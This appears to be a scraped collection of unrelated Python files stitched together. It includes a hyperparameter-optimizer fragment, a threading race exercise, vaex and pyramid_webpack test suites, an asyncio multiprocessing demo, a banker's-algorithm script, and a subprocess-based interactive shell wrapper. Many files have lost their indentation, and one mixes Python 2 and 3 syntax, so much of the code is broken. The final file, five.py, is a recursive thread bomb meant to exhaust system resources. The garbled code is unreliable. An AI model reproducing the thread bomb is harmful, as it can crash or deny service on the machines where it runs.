new_max_budget = self.max_budget / self.min_budget
new_min_budget = 1
old_min_budget = self.min_budget
def obj(config, n_resource, extra_conf):
budget = n_resource * old_min_budget
res = objective_function(config, budget=budget, **kwargs)
# config = Configuration(cs, dic)
# res = {
# Key.FUNC_VALUE:res[Key.FUNC_VALUE], # minimize
# Key.COST: res.get(Key.COST, n_resource),
# "info": {
# Key.REGRET_TEST: res.get(Key.REGRET_TEST, 0),
# Key.BUDGET: n_resource
# }}
# trials.append(Trial(config,
# config.get_dictionary(),
# observe_value=res[Key.FUNC_VALUE],
# info={
# Key.REGRET_TEST: res["info"][Key.REGRET_TEST],
# Key.REGRET_VAL: res[Key.FUNC_VALUE],
# Key.COST: res[Key.COST]
# }))
obs = Float(res[Key.FUNC_VALUE])
obs.regret_test = res.get(Key.REGRET_TEST, 0)
result = {
"objective_value":obs,
}
return result
        def work():
            # worker process that evaluates configurations dispatched by the mqMFES master;
            # needed because self.p = Process(target=work, ...) below references it
            worker = mqmfWorker(obj, '127.0.0.1', self.port, authkey=b'abc')
            worker.run()
self._inner_opt = mqMFES(
None, cs, new_max_budget, eta=kwargs.get("eta", 3),
num_iter=kwargs.get('round_limit', 50), random_state=seed,
method_id='-', restart_needed=True,
time_limit_per_trial=999999,
runtime_limit=np.inf,
ip='127.0.0.1', port=self.port, authkey=b'abc'
)
self._inner_opt.iterate_r = (self._inner_opt.R * self._inner_opt.eta ** -np.linspace(
start=self._inner_opt.s_max, stop=0, num=self._inner_opt.s_max+1)).astype('int').tolist()
self._inner_opt.target_x = {k:[] for k in self._inner_opt.iterate_r}
self._inner_opt.target_y = {k:[] for k in self._inner_opt.iterate_r}
map_old = self._inner_opt.weighted_surrogate.surrogate_r.copy()
self._inner_opt.weighted_surrogate.surrogate_r = self._inner_opt.iterate_r.copy()
self._inner_opt.weighted_surrogate.surrogate_container = {self._inner_opt.weighted_surrogate.surrogate_r[i]:self._inner_opt.weighted_surrogate.surrogate_container[map_old[i]] for i in range(len(map_old))}
self._inner_opt.weighted_surrogate.surrogate_weight = {self._inner_opt.weighted_surrogate.surrogate_r[i]:self._inner_opt.weighted_surrogate.surrogate_weight[map_old[i]] for i in range(len(map_old))}
self.p=Process(target=work, args=())
self.p.start()
self.kwargs = kwargs
def _optimize(self):
self._inner_opt.run()
self.p.terminate()
self._calc_trials(self._inner_opt.recorder)
self._inner_opt.master_messager.workerQueue._manager.shutdown()
self.p.join()
self._inner_opt.master_messager.workerQueue._manager.join()
# time.sleep(10)
return self.trials
def _calc_trials(self, data):
# valid_regret = []
# test_regret = []
# costs = []
for obs in data:
r_info = obs["return_info"]
curr_regret = r_info["loss"]
config = obs["configuration"]
dic = config.get_dictionary()
curr_test_regret = curr_regret.regret_test
self.trials.add_a_trial(
Trial(config,
dic,
observe_value=curr_regret,
info={
Key.REGRET_TEST: curr_test_regret,
Key.REGRET_VAL: curr_regret,
Key.COST: r_info["n_iteration"] * self.min_budget
}), permit_duplicate=True)
opt_class = HB_opt
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python foo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for j in range(1000000):
i+=1
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for j in range(1000000):
i-=1
def main():
# TODO: Something is missing here (needed to print i)
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
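# --- hedged follow-up sketch (not part of the original exercise) ---
# Because `i += 1` and `i -= 1` are not atomic, the two threads race and the printed
# "magic number" is usually not 0. A minimal fix, assuming we may modify the workers,
# is to guard the counter with a threading.Lock:
#
#   from threading import Lock
#   lock = Lock()
#
#   def incrementingFunction():
#       global i
#       for j in range(1000000):
#           with lock:
#               i += 1
#
# (and the same `with lock:` block in decrementingFunction), after which main()
# reliably prints 0.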
|
execution_test.py
|
from unittest.mock import MagicMock
from concurrent.futures import ThreadPoolExecutor
import concurrent.futures
import platform
import threading
import pytest
import numpy as np
from common import small_buffer
import vaex
def test_evaluate_expression_once():
calls = 0
def add(a, b):
nonlocal calls
if len(a) > 1: # skip dtype calls
calls += 1
return a + b
x = np.arange(5)
y = x**2
df = vaex.from_arrays(x=x, y=y)
df.add_function('add', add)
df['z'] = df.func.add(df.x, df.y)
df.executor.passes = 0
df.z.sum(delay=True)
df._set('z', delay=True)
calls = 0
df.execute()
assert df.executor.passes == 1
assert calls == 1
def test_nested_use_of_executor():
df = vaex.from_scalars(x=1, y=2)
@vaex.delayed
def next(x):
        # although the executor is still in its loop, it's not using the threads anymore
# so we should be able to use the executor again
return x + df.y.sum()
value = next(df.x.sum(delay=True))
df.execute()
assert value.get() == 1 + 2
def test_passes_two_datasets():
df1 = vaex.from_scalars(x=1, y=2)
df2 = vaex.from_scalars(x=1, y=3)
executor = df1.executor
executor.passes = 0
df1.sum('x')
assert executor.passes == 1
df1.sum('x', delay=True)
df2.sum('x', delay=True)
df1.execute()
assert executor.passes == 3
def test_passes_two_datasets_different_vars():
x = np.array([2.])
y = x**2
dataset = vaex.dataset.DatasetArrays(x=x, y=y)
df1 = vaex.from_dataset(dataset)
df2 = vaex.from_dataset(dataset)
df1.variables['a'] = 1
df2.variables['a'] = 2
df1['z'] = 'x + y * a'
df2['z'] = 'x + y * a'
executor = df1.executor
executor.passes = 0
s1 = df1.sum('z', delay=True)
s2 = df2.sum('z', delay=True)
df1.execute()
assert executor.passes == 1
assert s1.get() == 2 + 4 * 1
assert s2.get() == 2 + 4 * 2
def test_passes_two_datasets_different_expressions():
x = np.array([2.])
y = x**2
dataset = vaex.dataset.DatasetArrays(x=x, y=y)
df1 = vaex.from_dataset(dataset)
df2 = vaex.from_dataset(dataset)
df1['a'] = 'x * y'
df2['b'] = 'x + y'
executor = df1.executor
executor.passes = 0
s1 = df1.sum('a', delay=True)
s2 = df2.sum('b', delay=True)
df1.execute()
assert executor.passes == 1
assert s1.get() == 2 * 4
assert s2.get() == 2 + 4
def test_passes_filtering():
x = np.arange(10)
df = vaex.from_arrays(x=x, y=x**2)
df1 = df[df.x < 4]
df2 = df[df.x > 7]
executor = df.executor
executor.passes = 0
result1 = df1.sum('x', delay=True)
result2 = df2.sum('x', delay=True)
df.execute()
assert executor.passes == 1
assert result1.get() == 1 + 2 + 3
assert result2.get() == 8 + 9
def test_passes_mixed_filtering():
x = np.arange(10)
df = vaex.from_arrays(x=x, y=x**2)
df1 = df[df.x < 4]
df2 = df
executor = df.executor
executor.passes = 0
result1 = df1.sum('x', delay=True)
result2 = df2.sum('x', delay=True)
df.execute()
assert executor.passes == 1
assert result1.get() == 1 + 2 + 3
assert result2.get() == 45
def test_multiple_tasks_different_columns_names():
df1 = vaex.from_scalars(x=1, y=2)
df2 = vaex.from_scalars(x=1, y=2)
x = df1.sum('x', delay=True)
y = df2.sum('y', delay=True)
df1.execute()
assert x.get() == 1
assert y.get() == 2
def test_merge_aggregation_tasks():
df = vaex.from_arrays(x=[1, 2], y=[2, 3])
binners = df._create_binners('x', [0.5, 2.5], 2)
binners2 = df._create_binners('x', [0.5, 2.5], 2)
assert len(binners) == 1
vaex.agg.count().add_tasks(df, binners, progress=False)
assert len(df.executor.tasks) == 1
assert binners is not binners2
assert binners[0] is not binners2[0]
assert binners == binners2
assert binners[0] == binners2[0]
vaex.agg.sum('y').add_tasks(df, binners, progress=False)
assert len(df.executor.tasks) == 2
tasks = df.executor._pop_tasks()
assert len(tasks) == 2
tasks = vaex.execution._merge_tasks_for_df(tasks, df)
assert len(tasks) == 1
assert isinstance(tasks[0], vaex.tasks.TaskAggregations)
def test_merge_same_aggregation_tasks():
df = vaex.from_arrays(x=[1, 2], y=[2, 3])
binners = df._create_binners('x', [0.5, 2.5], 2)
binners2 = df._create_binners('x', [0.5, 2.5], 2)
assert len(binners) == 1
# these two aggregations should be merged into 1 subtask
[task1], result1 = vaex.agg.count().add_tasks(df, binners, progress=False)
[task2], result2 = vaex.agg.count().add_tasks(df, binners, progress=False)
assert len(df.executor.tasks) == 1
df.execute()
assert task1 is task2
assert np.all(result1.get() == result2.get())
def test_signals(df):
x = np.arange(10)
y = x**2
sum_x_expected = x.sum()
sum_y_expected = y.sum()
with vaex.cache.off():
mock_begin = MagicMock()
mock_progress = MagicMock()
mock_end = MagicMock()
len(df) # ensure we have the filter precomputed
df.executor.signal_begin.connect(mock_begin)
df.executor.signal_progress.connect(mock_progress)
df.executor.signal_end.connect(mock_end)
sum_x = df.sum(df.x, delay=True)
sum_y = df.sum(df.y, delay=True)
df.execute()
assert sum_x.get() == sum_x_expected
assert sum_y.get() == sum_y_expected
mock_begin.assert_called_once()
mock_progress.assert_called_with(1.0)
mock_end.assert_called_once()
def test_reentrant_catch(df_local):
with vaex.cache.off():
df = df_local
# a 'worker' thread should not be allowed to trigger a new computation
def progress(fraction):
print('progress', fraction)
df.count(df.x) # enters the executor again
with pytest.raises(RuntimeError) as exc:
df.count(df.x, progress=progress)
assert 'nested' in str(exc.value)
@pytest.mark.skipif(platform.system().lower() == 'windows', reason="hangs appveyor very often, bug?")
def test_thread_safe(df_local):
with vaex.cache.off():
df = df_local
# but an executor should be thread save
def do():
return df_local.count(df.x) # enters the executor from a thread
count = df_local.count(df.x)
tpe = ThreadPoolExecutor(4)
futures = []
passes = df.executor.passes
N = 100
with small_buffer(df):
for i in range(N):
futures.append(tpe.submit(do))
done, not_done = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_EXCEPTION)
for future in done:
assert count == future.result()
assert df.executor.passes <= passes + N
def test_delayed(df):
with vaex.cache.off():
@vaex.delayed
def add(a, b):
return a + b
total_promise = add(df.sum(df.x, delay=True), 1)
df.execute()
assert total_promise.get() == df.sum(df.x) + 1
def test_nested_task(df):
with vaex.cache.off():
@vaex.delayed
def add(a, b):
return a + b
total_promise = add(df.sum(df.x, delay=True))
@vaex.delayed
def next(value):
# during the handling of the sum task, we add a new task
sumy_promise = df.sum(df.y, delay=True)
if df.is_local():
assert not df.executor.local.executing
            # without calling the executor, since it should still be running its main loop
return add(sumy_promise, value)
total_promise = next(df.sum(df.x, delay=True))
df.execute()
assert total_promise.get() == df.sum(df.x) + df.sum(df.y)
def test_executor_from_other_thread():
with vaex.cache.off():
df = vaex.from_arrays(x=[1, 2])
def execute():
# but call execute from a different thread
df.execute()
# we add a tasks from the main thread, we use binby without limits to force
# a double computation.
c = df.count('x', binby='x', delay=True, edges=True)
thread = threading.Thread(target=execute)
thread.start()
thread.join()
assert sum(c.get()) == 2
def test_cancel_single_job():
df = vaex.from_arrays(x=[1, 2, 3])
res1 = df._set(df.x, unique_limit=1, delay=True)
res2 = df._set(df.x, delay=True)
df.execute()
assert res1.isRejected
assert res2.isFulfilled
def test_exception():
df = vaex.from_arrays(x=[1, 2, 3])
with pytest.raises(vaex.RowLimitException, match='.* >= 1 .*'):
df._set(df.x, unique_limit=1)
# def test_add_and_cancel_tasks(df_executor):
# df = df_executor
# def add_task_and_cancel(fraction):
# df.sum(df.x, delay=True)
# return False
# future = df.count(progress=add_task_and_cancel, delay=True)
# df.execute()
# with pytest.raises(vaex.execution.UserAbort):
# future.get()
# assert df.executor.tasks
# import vaex
# import vaex.dask
# import vaex.ray
# import numpy as np
# @pytest.fixture(params=['executor_dask', 'executor_ray'])
# def executor(request, executor_dask, executor_ray):
# named = dict(executor_dask=executor_dask, executor_ray=executor_ray)
# return named[request.param]
# @pytest.fixture(scope='session')
# def executor_ray():
# return vaex.ray.Executor(chunk_size=2)
# @pytest.fixture(scope='session')
# def executor_dask():
# return vaex.dask.Executor(chunk_size=2)
# @pytest.fixture
# def df():
# x = np.arange(10)
# y = x**2
# df = vaex.from_arrays(x=x, y=y)
# return df
# def test_task_sum(df, executor):
# total = df.x.sum()
# task = vaex.tasks.TaskSum(df, 'x')
# # df.executor = None
# # df._expressions = None
# # executor = vaex.ray.ExecutorRay()
# executor.schedule(task)
# executor.execute()
# assert task.result == total
# def test_sum(df, executor):
# total = df.x.sum()
# df.executor = executor
# total2 = df.x.sum()
# assert total == total2
|
__init__.py
|
""" Tests for pyramid_webpack """
import os
import inspect
import re
import json
import shutil
import tempfile
import webtest
from mock import MagicMock
from pyramid.config import Configurator
from pyramid.renderers import render_to_response
from six.moves.queue import Queue, Empty # pylint: disable=E0401
from threading import Thread
from pyramid_webpack import WebpackState, Webpack, StaticResource
try:
import unittest2 as unittest # pylint: disable=E0401
except ImportError:
import unittest
def load_stats(state, queue, *args, **kwargs):
""" Load stats and put it into a queue """
# Put a sentinel in the queue when the thread starts
queue.put(object())
stats = state.load_stats(*args, **kwargs)
queue.put(stats)
def run_load_stats(state, *args, **kwargs):
""" Run load_stats() in a thread """
queue = Queue()
thread_args = [state, queue]
thread_args.extend(args)
thread = Thread(target=load_stats, args=thread_args, kwargs=kwargs)
thread.daemon = True
thread.start()
# Wait until the thread is definitely started
queue.get(True)
return queue
class TempDirTest(unittest.TestCase):
""" Test class that provides filesystem helpers """
def setUp(self):
super(TempDirTest, self).setUp()
self._tempdir = tempfile.mkdtemp()
def tearDown(self):
super(TempDirTest, self).tearDown()
shutil.rmtree(self._tempdir)
def _write(self, filename, data):
""" Write json data to a file """
fullpath = os.path.join(self._tempdir, filename)
with open(fullpath, 'w') as ofile:
json.dump(data, ofile)
return fullpath
class TestWebpackState(TempDirTest):
""" Tests for the WebpackState """
def test_load_stats(self):
""" State loads stats from a json file """
data = {'a': 'b'}
stats_file = self._write('stats.json', data)
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
stats = state.load_stats()
self.assertEqual(stats, data)
def test_load_stats_as_asset(self):
"""
State loads stats from a json file specified in a:b/c.json notation
Tests the regression where loading the stats file specified in the
notation didn't work for Python 3 (before 3.6).
"""
settings = {
'webpack.stats_file': 'tests:test-stats.json',
}
state = WebpackState(settings)
stats = state.load_stats()
self.assertEqual(stats, {'a': 'b'})
def test_missing_stats(self):
""" raise IOError if stats file is missing """
state = WebpackState({})
with self.assertRaises(IOError):
state.load_stats()
def test_cache_stats(self):
""" When cache=True, cache the stats file """
data = {'a': 'b'}
stats_file = self._write('stats.json', data)
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
stats = state.load_stats(cache=True)
self.assertEqual(data, stats)
with open(stats_file, 'w') as ofile:
json.dump({'b': 'c'}, ofile)
second_stats = state.load_stats(cache=True)
self.assertEqual(second_stats, stats)
def test_no_cache_stats(self):
""" When cache=False, don't cache the stats file """
stats_file = self._write('stats.json', {'a': 'b'})
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
state.load_stats(cache=False)
data = {'b': 'c'}
with open(stats_file, 'w') as ofile:
json.dump(data, ofile)
stats = state.load_stats(cache=False)
self.assertEqual(stats, data)
def test_multiple_configs(self):
""" Multiple webpack states can have their own configs """
settings = {
'webpack.stats_file': 'foo',
'webpack.other.stats_file': 'bar',
}
state = WebpackState(settings)
self.assertTrue(state.stats_file.path.endswith(':foo'))
other_state = WebpackState(settings, name='other')
self.assertTrue(other_state.stats_file.path.endswith(':bar'))
def test_no_wait_for_compile(self):
""" The load_stats() call doesn't block if wait=False """
data = {'status': 'compiling'}
stats_file = self._write('stats.json', data)
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
queue = run_load_stats(state, wait=False)
# Blocks & doesn't raise an exception
stats = queue.get(True, 0.1)
self.assertEqual(stats, data)
def test_wait_for_compile(self):
""" The load_stats() call blocks until webpack is done compiling """
stats_file = self._write('stats.json', {'status': 'compiling'})
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
queue = run_load_stats(state, wait=True)
with self.assertRaises(Empty):
queue.get(True, 0.1)
stats = {'status': 'done'}
with open(stats_file, 'w') as ofile:
json.dump(stats, ofile)
data = queue.get(True, 5)
self.assertEqual(data, stats)
def test_compile_timeout(self):
""" The load_stats() call will timeout if compile takes too long """
stats_file = self._write('stats.json', {'status': 'compiling'})
settings = {
'webpack.stats_file': stats_file,
'webpack.timeout': 0.5,
}
state = WebpackState(settings)
with self.assertRaises(RuntimeError):
state.load_stats(wait=True)
def test_load_bad_data(self):
""" load_stats() raises ValueError if json data is bad """
stats_file = self._write('stats.json', {})
with open(stats_file, 'a') as ofile:
ofile.write('aaaaa')
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
with self.assertRaises(ValueError):
state.load_stats()
def test_abs_static_view(self):
""" Absolute bundle directory paths are stored unmodified """
settings = {
'webpack.bundle_dir': '/foo/bar/baz',
}
state = WebpackState(settings)
self.assertEqual(state.static_view_path, '/foo/bar/baz')
def test_unspecified_relative_bundle(self):
""" Relative bundle_dir paths with no package are given one """
settings = {
'webpack.bundle_dir': 'bundles',
}
state = WebpackState(settings, 'mypackage')
self.assertEqual(state.static_view_path, 'mypackage:bundles')
def test_static_package_resource(self):
""" StaticResource can load a package resource """
resource = StaticResource('pyramid_webpack:jinja2ext.py')
import pyramid_webpack.jinja2ext
with resource.open() as i:
self.assertEqual(i.read(),
inspect.getsource(pyramid_webpack.jinja2ext))
def test_future_expire(self):
""" cache_max_age = future uses 10 year expiration """
settings = {
'webpack.cache_max_age': 'future',
}
state = WebpackState(settings, 'mypackage')
self.assertTrue(state.cache_max_age > 100000)
def test_custom_expire(self):
""" cache_max_age can specify view expiration """
settings = {
'webpack.cache_max_age': '1234',
}
state = WebpackState(settings, 'mypackage')
self.assertEqual(state.cache_max_age, 1234)
def test_default_expire_debug(self):
""" cache_max_age defaults to None in debug mode """
settings = {
'webpack.debug': 'true',
}
state = WebpackState(settings, 'mypackage')
self.assertIsNone(state.cache_max_age)
def test_default_expire(self):
""" cache_max_age defaults to 3600 in non-debug mode """
settings = {
'webpack.debug': 'false',
}
state = WebpackState(settings, 'mypackage')
self.assertEqual(state.cache_max_age, 3600)
class TestWebpack(unittest.TestCase):
""" Test class for the Webpack functions """
def setUp(self):
super(TestWebpack, self).setUp()
self.request = MagicMock()
self.webpack = Webpack(self.request)
self.webpack.state = WebpackState({})
self.stats = {
'status': 'done',
'chunks': {
'main': [
{
'name': 'main.js',
'path': '/static/main.js',
}
],
},
}
self.webpack.state._load_stats = MagicMock()
self.webpack.state._load_stats.return_value = self.stats
def test_get_bundle(self):
""" get_bundle() returns the chunks with a 'url' key added """
bundle = self.webpack.get_bundle('main')
self.assertEqual(bundle, self.stats['chunks']['main'])
def test_filter_extensions(self):
""" get_bundle() can filter by file extension """
chunk = {
'name': 'main.css',
'path': '/static/main.css',
}
self.stats['chunks']['main'].append(chunk)
bundle = self.webpack.get_bundle('main', '.css')
self.assertEqual(bundle, [chunk])
def test_filter_multiple_extensions(self):
""" get_bundle() can filter by multiple file extensions """
chunk = {
'name': 'main.css',
'path': '/static/main.css',
}
self.stats['chunks']['main'].append(chunk)
bundle = self.webpack.get_bundle('main', '.js .css')
self.assertEqual(bundle, self.stats['chunks']['main'])
def test_filter_ignore(self):
""" get_bundle() can ignore files by glob """
chunk = {
'name': 'main.css',
'path': '/static/main.css',
}
self.stats['chunks']['main'].append(chunk)
self.webpack.state.ignore = ['*.css']
bundle = self.webpack.get_bundle('main')
self.assertEqual(bundle, self.stats['chunks']['main'][:1])
def test_filter_ignore_re(self):
""" get_bundle() can ignore files by regular expression """
chunk = {
'name': 'main.css',
'path': '/static/main.css',
}
self.stats['chunks']['main'].append(chunk)
self.webpack.state.ignore_re = [re.compile(r'.*\.css')]
bundle = self.webpack.get_bundle('main')
self.assertEqual(bundle, self.stats['chunks']['main'][:1])
def test_public_path(self):
""" pulicPath in a chunk becomes the url """
url = 'https://assets.cdn.com/main.js'
self.stats['chunks']['main'][0]['publicPath'] = url
bundle = self.webpack.get_bundle('main')
self.assertEqual(bundle[0]['url'], url)
def test_bad_bundle(self):
""" Getting a nonexistant bundle raises an exception """
with self.assertRaises(KeyError):
self.webpack.get_bundle('nope')
def test_error_status(self):
""" If stats has error status, raise an error """
self.stats['status'] = 'error'
self.stats['error'] = 'FrobnicationError'
self.stats['message'] = 'Retro quarks emitted during Frobnication'
with self.assertRaises(RuntimeError):
self.webpack.get_bundle('main')
def test_bad_status(self):
""" If stats has unknown status, raise an error """
self.stats['status'] = 'wat'
with self.assertRaises(RuntimeError):
self.webpack.get_bundle('main')
def test_missing_state(self):
""" Raise an error if no WebpackState found """
req = MagicMock()
req.registry.webpack = {}
with self.assertRaises(RuntimeError):
Webpack(req)
def _get_bundle(request):
""" Route view for the test webapp """
config = request.matchdict['config']
bundle_name = request.matchdict['bundle']
bundle = request.webpack(config).get_bundle(bundle_name)
renderer = request.params.get('renderer')
if renderer:
return render_to_response(renderer, {})
else:
return bundle
class TestWebapp(TempDirTest):
""" Pyramid app tests """
def setUp(self):
super(TestWebapp, self).setUp()
self.stats1 = {
'status': 'done',
'chunks': {
'main': [
{
'name': 'main.js',
'path': '/static/main.js',
},
],
},
}
self.stats2 = {
'status': 'done',
'chunks': {
'libs': [
{
'name': 'libs.js',
'path': '/static/libs.js',
},
],
},
}
settings = {
'pyramid.includes': ['pyramid_jinja2', 'pyramid_webpack'],
'jinja2.extensions': ['pyramid_webpack.jinja2ext:WebpackExtension'],
'jinja2.directories': ['tests:templates/'],
'webpack.debug': True,
'webpack.stats_file': self._write('stats1.json', self.stats1),
'webpack.configs': ['other'],
'webpack.other.stats_file': self._write('stats2.json', self.stats2),
}
config = Configurator(settings=settings)
config.add_route('bundle', '/bundle/{config}/{bundle}')
config.add_view(_get_bundle, route_name='bundle', renderer='json')
app = config.make_wsgi_app()
self.app = webtest.TestApp(app)
def tearDown(self):
self.app.reset()
def test_get_bundle(self):
""" get_bundle() returns a list of all chunks in the bundle """
res = self.app.get('/bundle/DEFAULT/main')
bundle = json.loads(res.body.decode('utf-8'))
expected = self.stats1['chunks']['main'][0]
self.assertEqual(len(bundle), 1)
self.assertEqual(bundle[0]['name'], expected['name'])
self.assertEqual(bundle[0]['path'], expected['path'])
self.assertTrue('url' in bundle[0])
def test_get_second_bundle(self):
""" get_bundle() works with the secondary webpack configs """
res = self.app.get('/bundle/other/libs')
bundle = json.loads(res.body.decode('utf-8'))
expected = self.stats2['chunks']['libs'][0]
self.assertEqual(len(bundle), 1)
self.assertEqual(bundle[0]['name'], expected['name'])
self.assertEqual(bundle[0]['path'], expected['path'])
self.assertTrue('url' in bundle[0])
def test_jinja2(self):
""" The jinja2 extension can use 'webasset' blocks """
res = self.app.get('/bundle/DEFAULT/main?renderer=paths.jinja2')
expected = self.stats1['chunks']['main'][0]
self.assertEqual(res.body.decode('utf-8'), expected['path'] + '\n')
def test_jinja2_ext(self):
""" The jinja2 extension can specify file extensions """
res = self.app.get('/bundle/other/libs?renderer=paths2.jinja2')
expected = self.stats2['chunks']['libs'][0]
self.assertEqual(res.body.decode('utf-8'), expected['path'] + '\n')
|
event_loop_in_processes.py
|
import asyncio
import os
import random
import typing
from multiprocessing import Process
processes = []
def cleanup():
global processes
while processes:
proc = processes.pop()
try:
proc.join()
except KeyboardInterrupt:
proc.terminate()
async def worker():
random_delay = random.randint(0, 3)
result = await asyncio.sleep(random_delay, result=f"Working in process: {os.getpid()}")
print(result)
def process_main(coro_worker: typing.Callable, num_of_coroutines: int):
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)  # make this loop the current loop for this process
    try:
        workers = [coro_worker() for _ in range(num_of_coroutines)]
        # asyncio.gather() no longer accepts a loop argument on Python 3.10+
        loop.run_until_complete(asyncio.gather(*workers))
    except KeyboardInterrupt:
        print(f"Stopping {os.getpid()}")
        loop.stop()
    finally:
        loop.close()
def main(processes, num_procs, num_coros, process_main):
for _ in range(num_procs):
proc = Process(target=process_main, args=(worker, num_coros))
processes.append(proc)
proc.start()
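# Hedged alternative sketch (an addition, not part of the original script): on
# Python 3.7+ the per-process entry point can skip manual loop management by
# using asyncio.run(), which creates, runs, and closes the loop for us. The
# function name below is made up for illustration and is not referenced above.
def process_main_with_asyncio_run(coro_worker: typing.Callable, num_of_coroutines: int):
    async def _run_all():
        await asyncio.gather(*(coro_worker() for _ in range(num_of_coroutines)))
    try:
        asyncio.run(_run_all())
    except KeyboardInterrupt:
        print(f"Stopping {os.getpid()}")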
if __name__ == '__main__':
try:
main(processes, 10, 2, process_main, )
except KeyboardInterrupt:
print("CTRL+C was pressed.. Stopping all subprocesses..")
finally:
cleanup()
print("Cleanup finished")
|
deadlock.py
|
import numpy as np
import psutil
import time
import subprocess as sp
from threading import Thread
import matplotlib.pyplot as plt
# mat = {'p0': ['cpu', 'mem', 'storage']}
cpu = []
store = []
mem = []
need = {
'p0': [0, 1, 0, 0],
'p1': [0, 4, 2, 1],
'p2': [1, 0, 0, 1],
'p3': [0, 0, 2, 0],
'p4': [0, 6, 4, 2]
}
allocation = {
'p0': [0, 1, 1, 0],
'p1': [1, 2, 3, 1],
'p2': [1, 3, 6, 5],
'p3': [0, 6, 3, 2],
'p4': [0, 0, 1, 4]
}
work = ['p0', 'p1', 'p2', 'p3', 'p4']
available = [1, 5, 2, 0]
safe_sequence = [] # [p1,p3,p4,p0,p2]
def banker():
global available
global need
global safe_sequence
j = 0 # keeping index
while len(work) > 0:
i = work[j] # process of jth index
# if np.array_equal(np.maximum(available, need[i]), available) == True:
if not (False in list(np.greater_equal(available, need[i]))):
available = np.add(available, allocation[i])
safe_sequence.append(i)
work.remove(i)
            if j == len(work):  # if the removed element was the last one, wrap the index back to 0
j = 0
else:
j = (j + 1) % len(work)
# safe seq
s_seq = ''
for i in range(len(safe_sequence)):
if i != (len(safe_sequence) - 1):
s_seq += f'{safe_sequence[i]}->'
else:
s_seq += f'{safe_sequence[i]}'
print(s_seq)
print(need)
print(list(available))
def get_cpu():
prev_t = 0
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
#return delta # Returns CPU util in percentage
cpu.append(delta)
def get_mem():
cmd = ['cat /proc/meminfo | grep MemFree |cut -d ":" -f 2 | cut -d "k" -f 1']
free_mem = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
    cmd = ['cat /proc/meminfo | grep MemAvailable | cut -d ":" -f 2 | cut -d "k" -f 1']
    avail_mem = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
    mem_util = (int(free_mem.strip()) / int(avail_mem.strip())) * 100  # MemFree as a share of MemAvailable
#return mem_util # Returns memory util in percentage
mem.append(mem_util)
def get_storage():
cmd = ['df -t ext4 | tail -n 2 | head -n 1 | cut -d " " -f 14 | cut -c 1-2']
storage = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
#return int(storage.strip()) # Returns storage in percentage
store.append(int(storage.strip()))
def get_resource_util():
h1 = Thread(target=get_mem)
h2 = Thread(target=get_cpu)
h3 = Thread(target=get_storage)
h1.start()
h2.start()
h3.start()
def calculate_mov_avg(a1):
ma1=[] # moving average list
    avg1 = 0  # moving average, updated pointwise
count=0
for i in range(len(a1)):
count+=1
avg1=((count-1)*avg1+a1[i])/count
ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return ma1
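# Hedged sanity check (an addition, not in the original script): the cumulative
# average recurrence used above, mu_n = ((n - 1) * mu_{n-1} + x_n) / n, should
# turn [2, 4, 6] into the running means [2.0, 3.0, 4.0].
assert calculate_mov_avg([2, 4, 6]) == [2.0, 3.0, 4.0]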
def plot_resource_util():
global mem
global store
global cpu
plt.ion()
plt.grid(True, color='k')
plt.plot(calculate_mov_avg(cpu), linewidth=5, label='CPU')
plt.plot(calculate_mov_avg(mem), linewidth=5, label='Memory')
plt.plot(calculate_mov_avg(store), linewidth=5, label='Storage')
plt.title('Resource Utilization')
plt.ylabel('Utilization in percentage')
plt.xlabel('Time (scale of 2 seconds)')
plt.legend()
plt.pause(2)
banker()
|
interactive_shell.py
|
# -*- coding: UTF8 -*-
import sys
from subprocess import PIPE, Popen
from threading import Thread
from queue import Queue, Empty
import time
import traceback
ON_POSIX = 'posix' in sys.builtin_module_names
def write_output(out, queue):
try:
for c in iter(lambda: out.read(1), b""):
queue.put(c)
out.close()
except Exception as e:
print(traceback.format_exc())
def flush_loop(queue, encoding):
try:
while True:
buf=b""
while True:
try:
buf+=queue.get_nowait()
except Empty:
break
if buf:
if encoding:
try:
buf=buf.decode(encoding)
except Exception:
pass
sys.stdout.write(buf)
sys.stdout.flush()
time.sleep(0.5)
except Exception as e:
print(traceback.format_exc())
def interactive_open(program=None, encoding=None):
try:
if program is None:
if "win" in sys.platform.lower():
program="cmd.exe"
encoding="cp437"
else:
program="/bin/sh"
encoding=None
print "Opening interactive %s ... (encoding : %s)"%(program,encoding)
p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, shell=True, close_fds=ON_POSIX, universal_newlines=True)
q = Queue()
q2 = Queue()
t = Thread(target=write_output, args=(p.stdout, q))
t.daemon = True
t.start()
t = Thread(target=write_output, args=(p.stderr, q2))
t.daemon = True
t.start()
t = Thread(target=flush_loop, args=(q, encoding))
t.daemon = True
t.start()
t = Thread(target=flush_loop, args=(q2, encoding))
t.daemon = True
t.start()
while True:
line = input()
p.stdin.write(line+"\n")
if line.strip()=="exit":
break
except Exception as e:
print(traceback.format_exc())
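# Hedged usage sketch (an addition, not in the original): run this module
# directly to get an interactive shell bound to the platform default
# (cmd.exe on Windows, /bin/sh elsewhere). Type "exit" to quit.
if __name__ == "__main__":
    interactive_open()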
|
five.py
|
from threading import Thread
def bomb():
    # Thread.start() returns None, so create the threads first, then start and join them.
    t1 = Thread(target=bomb)
    t2 = Thread(target=bomb)
    t1.start()
